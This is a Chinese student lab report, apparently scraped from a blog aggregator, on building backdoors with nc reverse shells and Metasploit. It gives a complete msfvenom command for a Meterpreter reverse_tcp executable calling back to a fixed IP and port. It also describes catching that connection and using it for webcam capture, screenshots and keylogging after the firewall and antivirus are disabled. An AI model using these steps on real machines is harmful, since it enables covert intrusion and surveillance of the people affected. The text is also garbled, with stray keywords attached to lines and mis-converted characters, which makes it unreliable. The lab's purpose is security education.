expert 2 後門原理與實踐

Expert 2linux


學習內容:使用nc實現winLinux間的後門鏈接 :meterpreter的應用 :MSF POST 模塊的應用 shell

學習目標:創建一個後門鏈接是如此的簡單,功能又如此強大。經過親手實踐並瞭解這一事實,從而提升本身的安全意識 windows

後門概念安全

後門就是不通過正常認證流程而訪問系統的通道。網絡

哪裏有後門呢?tcp

1編譯器留後門函數

2操做系統留後門學習

3最多見的固然仍是應用程序中留後門編碼

4還有就是潛伏於操做系統中或假裝爲特定應用的專用後門程序。spa

--

 

實驗準備:

一、把虛擬機kali的網絡改成橋接

 

二、修改windows控制檯的編碼方式

法一:cmd中輸入 CHCP 65001(臨時轉碼,不可永久)

法二:修改regedit註冊表

詳細操做見此地址:(百度的力量十分強大)https://blog.csdn.net/chy555chy/article/details/78355985

3、關掉防火牆與殺毒軟件

1、實驗內容

(一)Windows得到Linux Shell

Windows下,先使用ipconfig指令查看win10(物理機)

2使用ncat.exe程序監聽本機的1120端口:

3Kali:使用nc指令的-e選項反向鏈接Windows主機的1120端口

4Windows下成功得到了一個Kalishell,運行ls指令以下此時沒有亂碼,這是爲啥要提早修改編碼方式UTF-8

(二)、kali得到win10shell

 先用 ifconfig 查看kaliIP地址

再用Linux監聽端口1120最後windows反彈鏈接kali

成功得到windows10shell

(三)使用nc進行數據通訊,windows監聽端口1120Linux反彈鏈接

 

)使用MSF meterpreter生成可執行文件,利用ncat傳送到主機並運行獲取主機Shell

輸入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.3.126 LPORT=1120

-f exe > 20151120_backdoor.exe 生成後門程序

 

Linux上使用 msfconsle 指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口

設置完成後,執行監聽指令 exploit 。打開windows上的後門程序20151120_backdoor.exe

能夠輸入指令遠程打開對方的攝像頭抓拍、截屏、擊鍵記錄、查看用戶等等

實驗結果以下

偷拍結果:

遠程截屏:

  1. 例舉你能想到的一個後門進入到你係統中的可能方式?

惡意程序攻入,綁定病毒

 

  1. 例舉你知道的後門如何啓動起來(winlinux)的方式?

觸發系統函數從而啓動後門

3.Meterpreter有哪些給你映像深入的功能?

簡直事強大的太厲害了,能夠像搭積木同樣組裝攻擊模塊兒,能夠成爲批量攻擊的有利武器,爲此,感受網絡世界太危險。戰戰兢兢。之後要多學點知識。保護隱私。

4.如何發現本身有系統有沒有被安裝後門?

開開360、毒霸,看看有木有異常進程與不明代碼

5、實驗心得與體會

       經過此次實驗讓我以爲原來黑客攻防是這個樣子,感受頗有趣,很好玩。

相關文章
相關標籤/搜索